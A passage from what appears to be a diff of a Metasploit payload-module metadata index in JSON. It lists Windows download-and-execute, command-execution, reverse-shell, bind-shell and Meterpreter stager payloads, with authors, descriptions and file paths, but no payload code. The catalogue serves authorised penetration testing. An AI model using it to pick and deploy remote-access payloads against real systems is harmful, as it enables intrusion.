"notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/download_eval_vbs": { - "name": "Windows Executable Download and Evaluate VBS", - "fullname": "payload/cmd/windows/download_eval_vbs", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "scriptjunkie" - ], - "description": "Downloads a file from an HTTP(S) URL and executes it as a vbs script.\n Use it to stage a vbs encoded payload from a short command line.", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/download_eval_vbs.rb", - "is_install_path": true, - "ref_name": "cmd/windows/download_eval_vbs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/download_exec_vbs": { - "name": "Windows Executable Download and Execute (via .vbs)", - "fullname": "payload/cmd/windows/download_exec_vbs", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "scriptjunkie" - ], - "description": "Download an EXE from an HTTP(S) URL and execute it", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/download_exec_vbs.rb", - "is_install_path": true, - "ref_name": "cmd/windows/download_exec_vbs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/generic": { - "name": 
"Windows Command, Generic Command Execution", - "fullname": "payload/cmd/windows/generic", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "juan vazquez " - ], - "description": "Executes the supplied command", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/generic.rb", - "is_install_path": true, - "ref_name": "cmd/windows/generic", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/http/x64/custom/bind_ipv6_tcp": { - "name": "HTTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/http/x64/custom/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - 
"payload_cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid": { - "name": "HTTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/http/x64/custom/bind_named_pipe": { - "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/http/x64/custom/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 
14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/http/x64/custom/bind_tcp": { - "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/http/x64/custom/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/http/x64/custom/bind_tcp_rc4": { - "name": "HTTP Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/http/x64/custom/bind_tcp_rc4", - "aliases": [], - "rank": 300, - 
"disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/http/x64/custom/bind_tcp_uuid": { - "name": "HTTP Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/http/x64/custom/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - 
"session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/http/x64/custom/reverse_http": { - "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/http/x64/custom/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/reverse_http", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/http/x64/custom/reverse_https": { - "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/http/x64/custom/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode 
stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/reverse_https", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/http/x64/custom/reverse_named_pipe": { - "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/http/x64/custom/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/reverse_named_pipe", - "staged": true, - "stage_refname": 
"windows/x64/custom", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/http/x64/custom/reverse_tcp": { - "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/http/x64/custom/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/http/x64/custom/reverse_tcp_rc4": { - "name": "HTTP Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/http/x64/custom/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - 
"targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/http/x64/custom/reverse_tcp_uuid": { - "name": "HTTP Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/http/x64/custom/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/http/x64/custom/reverse_winhttp": { - "name": "HTTP Fetch, Windows shellcode stage, Windows x64 
Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/http/x64/custom/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/http/x64/custom/reverse_winhttps": { - "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/http/x64/custom/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": 
"cmd/windows/http/x64/custom/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/http/x64/encrypted_shell/reverse_tcp": { - "name": "HTTP Fetch, Windows Command Shell, Encrypted Reverse TCP Stager", - "fullname": "payload/cmd/windows/http/x64/encrypted_shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Matt Graeber", - "Shelby Pace" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/encrypted_shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/encrypted_shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/encrypted_shell", - "stager_refname": "windows/x64/encrypted_reverse_tcp" - }, - "payload_cmd/windows/http/x64/encrypted_shell_reverse_tcp": { - "name": "HTTP Fetch, Windows Encrypted Reverse Shell", - "fullname": "payload/cmd/windows/http/x64/encrypted_shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan 
Watters", - "Matt Graeber", - "Shelby Pace" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn an encrypted command shell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/encrypted_shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/encrypted_shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/http/x64/exec": { - "name": "HTTP Fetch, Windows x64 Execute Command", - "fullname": "payload/cmd/windows/http/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nExecute an arbitrary command (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/exec", - "staged": false - }, - "payload_cmd/windows/http/x64/loadlibrary": { - "name": "HTTP Fetch, Windows x64 LoadLibrary Path", - "fullname": "payload/cmd/windows/http/x64/loadlibrary", - "aliases": 
[], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "scriptjunkie", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nLoad an arbitrary x64 library path", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/loadlibrary", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/loadlibrary", - "staged": false - }, - "payload_cmd/windows/http/x64/messagebox": { - "name": "HTTP Fetch, Windows MessageBox x64", - "fullname": "payload/cmd/windows/http/x64/messagebox", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "pasta " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a dialog via MessageBox using a customizable title, text & icon", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/messagebox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/messagebox", - "staged": false - }, - "payload_cmd/windows/http/x64/meterpreter/bind_ipv6_tcp": { - "name": "HTTP Fetch, Windows x64 
IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid": { - "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": 
null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/http/x64/meterpreter/bind_named_pipe": { - "name": "HTTP Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_named_pipe" - }, - 
"payload_cmd/windows/http/x64/meterpreter/bind_tcp": { - "name": "HTTP Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/http/x64/meterpreter/bind_tcp_rc4": { - "name": "HTTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 
